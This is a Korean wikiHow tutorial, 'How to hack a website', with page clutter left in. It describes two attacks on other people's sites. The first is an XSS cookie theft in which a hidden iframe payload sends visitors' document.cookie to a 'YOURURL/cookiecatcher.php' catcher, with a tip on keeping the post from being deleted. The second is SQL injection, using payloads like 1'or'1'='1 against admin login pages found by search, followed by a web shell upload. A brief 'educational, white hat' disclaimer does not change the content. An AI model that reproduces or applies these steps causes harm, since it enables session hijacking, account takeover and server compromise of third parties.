Skip to Content

로그인/회원 가입

웹사이트 해킹하는 방법

PDF 다운로드

작성자 정보

PDF 다운로드

어떤 사람들은 모든 해커들은 나쁜 의도를 갖고 있을 것이라 생각하지만 이는 사실이 아니다! "화이트 햇"이라 불리는 해커 집단은 기업 보안 시스템의 약점을 알아내고 이에 대해 경고해주는 역할을 한다. 또한 어떤 해커들은 자신의 비즈니스용 웹사이트를 더 강화시키고 정보를 보호하기 위해 해킹을 하기도 한다. 이 글에서는 "좋은" 해커가 되기 위한 두 가지 해킹 방법에 대해 설명한다.

방법 1

방법 1 의 3:

크로스-사이트 스크립팅 사용하기

PDF 다운로드

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-460px-Hack-a-Website-Step-1-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/e\/e6\/Hack-a-Website-Step-1-Version-2.jpg\/v4-728px-Hack-a-Website-Step-1-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

적합한 예에는 메시지 보드가 있다. 사이트가 크로스-사이트 스크립팅 공격에 취약하지 않은 경우라면 이 방법을 쓸 수 없다는 것을 기억하자.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-460px-Hack-a-Website-Step-2-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-2-Version-2.jpg\/v4-728px-Hack-a-Website-Step-2-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

2
사이트에서 포스팅을 만든다. "포스팅"에 클릭하는 사람의 모든 데이터를 잡을 수 있는 특별한 코드를 입력해야 한다.
- 시스템 필더가 코드를 필터링 하는지 테스트 하는 게 좋다.
```
<script>window.alert("test")</script>
```
  를 올린다. 포스팅을 클릭할 때 알림창이 뜨면, 사이트가 공격에 취약한 것이다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-460px-Hack-a-Website-Step-3-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/4\/46\/Hack-a-Website-Step-3-Version-2.jpg\/v4-728px-Hack-a-Website-Step-3-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

이 공격의 목표는 사용자의 쿠키를 잡는 것인데, 이렇게 하면로그인이 취약한 웹사이트 계정에 접근할 수 있다. 공격의 대상이 되는 쿠키를 잡고 리라우팅을 해주는 쿠키 캐쳐가 필요하다. 캐쳐를 접근할 수 있고, PHP를 지원하고, 업로드 원격 코드 실행에 취약한 웹 사이트에 업로드한다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-460px-Hack-a-Website-Step-4-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/b\/b9\/Hack-a-Website-Step-4-Version-2.jpg\/v4-728px-Hack-a-Website-Step-4-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

4
자신의 쿠키 캐쳐로 포스팅한다. 글에 쿠키를 잡을 수 있는 적절한 코드를 입력하고 자신의 사이트로 보낸다. 코드 뒤에 텍스트를 붙이면 의심을 받아서 지워지지 않도록 할 수 있다.
- 코드 예시는 다음과 같다.
  <iframe frameborder="0" height="0" width="0" src="javascript...:void(document.location='YOURURL/cookiecatcher.php?c=' document.cookie)></iframe>
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-460px-Hack-a-Website-Step-5-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/d\/df\/Hack-a-Website-Step-5-Version-2.jpg\/v4-728px-Hack-a-Website-Step-5-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

이렇게 하고 나면 원하는 목적에 맞게 웹사이트에 저장된 쿠키 정보를 사용할 수 있다.

광고

방법 2

방법 2 의 3:

인젝션 공격 수행하기

PDF 다운로드

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-460px-Hack-a-Website-Step-6-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-6-Version-2.jpg\/v4-728px-Hack-a-Website-Step-6-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

쉽게 관리자 로그인에 접근할 수 있는 취약한 사이트를 찾아야 한다. 원하는 검색엔진에 admin login.asp 또는 admin login.php를 검색한다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-460px-Hack-a-Website-Step-7-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/af\/Hack-a-Website-Step-7-Version-2.jpg\/v4-728px-Hack-a-Website-Step-7-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

사용자 이름으로 admin을 입력하고 다른 문자열의 번호 중 하나를 비밀번호로 사용한다. 다른 문자열에 있는 번호 중 아무거나 골라도 되지만, 흔한 예시를 들자면, 1'또는'1'='1 또는 2'='2이다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-460px-Hack-a-Website-Step-8-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/5\/5b\/Hack-a-Website-Step-8-Version-2.jpg\/v4-728px-Hack-a-Website-Step-8-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

시도를 많이 해야 하고 오류도 많이 날 것이다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-460px-Hack-a-Website-Step-9-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/26\/Hack-a-Website-Step-9-Version-2.jpg\/v4-728px-Hack-a-Website-Step-9-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

결국 웹사이트 관리자로 접근할 수 있는 문자열을 찾을 수 있을텐데, 그 웹사이트가 공격에 취약하다는 의미기도 하다. 그러면 관리자로 로그인한 후, 파일 업로드를 하고 싶은 경우, 서버쪽 접근을 하기 위해 웹 쉘을 업로드 하는 등의 작업을 수행할 수 있다.

광고

방법 3

방법 3 의 3:

성공하기

PDF 다운로드

{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-460px-Hack-a-Website-Step-10-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/0\/00\/Hack-a-Website-Step-10-Version-2.jpg\/v4-728px-Hack-a-Website-Step-10-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

웹사이트 해킹 방법을 알고 싶다면, 컴퓨터와 다른 기술이 어떻게 작동하는지 알아야 한다. 파이썬, PHP (서버 쪽을 망가뜨리려면 필요함) 또는 SQL과 같은 프로그래밍 언어를 배우면 컴퓨터 제어가 쉬워지고 시스템에서 취약한 점을 알아낼 수 있다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-460px-Hack-a-Website-Step-11-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2f\/Hack-a-Website-Step-11-Version-2.jpg\/v4-728px-Hack-a-Website-Step-11-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

특히 웹사이트 해킹을 하고 싶다면, HTML 과JavaScript를 잘 알고 있어야 한다. 배우려면 시간이 걸리지만, 인터넷에서 무료로 배울 수 있는 방법이 많기 때문에 배우고 싶다면 금방 배울 수 있다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-460px-Hack-a-Website-Step-12-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/a\/a2\/Hack-a-Website-Step-12-Version-2.jpg\/v4-728px-Hack-a-Website-Step-12-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

화이트 햇은 좋은 목적으로 자신의 능력을 활용하는 해커들로, 보안의 취약성을 드러내어 모두에게 인터넷을 더 좋은 환경으로 만드는 역할을 한다. 해킹하는 방법을 배우고 싶고, 좋은 목적으로 자신의 능력을 활용하고 싶다거나 자신의 웹사이트를 보호하고 싶다면 현재 활동중인 화이트 햇에게 조언을 구하는 것도 좋다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-460px-Hack-a-Website-Step-13-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/2\/2c\/Hack-a-Website-Step-13-Version-2.jpg\/v4-728px-Hack-a-Website-Step-13-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

해킹 방법을 배우고 싶거나, 자신을 보호하고 싶다면 많이 찾아봐야 한다. 웹사이트는 많은 부분에서 취약할 수 있으며, 그 부분들은 계속 바뀌기 때문에 계속해서 배워야 한다.
{"smallUrl":"https:\/\/www.wikihow.com\/images_en\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-460px-Hack-a-Website-Step-14-Version-2.jpg","bigUrl":"https:\/\/www.wikihow.com\/images\/thumb\/c\/ce\/Hack-a-Website-Step-14-Version-2.jpg\/v4-728px-Hack-a-Website-Step-14-Version-2.jpg","smallWidth":460,"smallHeight":345,"bigWidth":728,"bigHeight":546,"licensing":"<div class=\"mw-parser-output\"><\/div>"}

해킹 방법은 계속해서 바뀌고, 취약점은 새롭게 발견되기 때문에, 최신 정보를 알아야 한다. 어떤 해킹 유형으로부터 보호했다고 해서 앞으로 안전이 보장되지 않는다!

광고

팁

해커 포럼으로 가면 유용한 팁을 얻을 수 있다.
이 튜토리얼은 화이트 햇 해킹을 배우기 시작하는 사람들을 돕거나 자신의 웹사이트를 잘 보호하기 위해 해커들이 어떻게 작업하는지 알 수 있도록 교육용으로만 작성되었다.

광고

경고

이 글을 읽고나서 바로 해커가 되지는 앟는다. 자신의 스킬을 연구하고 연습하고, 연습하고 또 연습해야 한다.

광고

관련 위키하우

광고

이 위키하우에 대하여

위키하우 글은 여러명의 작성자에 의해 공동 작성될 수 있습니다. 이 글은 익명을 포함한 110 명의 작성자들이 꾸준히 편집하여 개선되었습니다. 조회수 57,216회

글 카테고리: 인터넷

이탈리아어

포르투갈어

인도네시아어

네덜란드어

인쇄

이 문서는 57,216 번 조회 되었습니다.

이 글이 도움이 되었나요?

광고

-

-

368

.mwimg a.image{display:none}#header_logo{display:none}#cse-search-box{display:none}#cse-search-box-noscript{display:block !important}#cse-search-box-noscript .cse_q{color:#FFF;background-color:#B3CE9C}.wh_search .cse_q{width:88%}#mw-mf-main-menu-button{display:none;visibility:hidden}.header .search{display:none}#search_footer .cse_sa{background-image:url(/extensions/wikihow/mobile/images/white_mag.png);background-size:22px}.related_box{display:block;background:#EEE;border:5px solid #FFF;vertical-align:bottom;width:127px;background-size:180px;float:left;height:120px;position:relative}.related_box p{line-height:15px !important;font-size:13px;background-color:rgba(67,95,44,.4);color:#FFF;font-weight:bold;padding:8px;margin:0 !important;position:absolute;bottom:0}#noscript_header_logo{display:table-cell;vertical-align:middle;background-position:50% 77%;background-repeat:no-repeat;background-image:url(/extensions/wikihow/mobile/images/wikihow_logo_230.png);background-size:105px;width:auto;height:51px;padding:0 14px}.articleinfo{display:none}#iorg_free_data{z-index:50;width:100%;position:fixed}#ara_recommendations{display:none}

Design a Mobile Website

View Site in Mobile | Classic

Share by: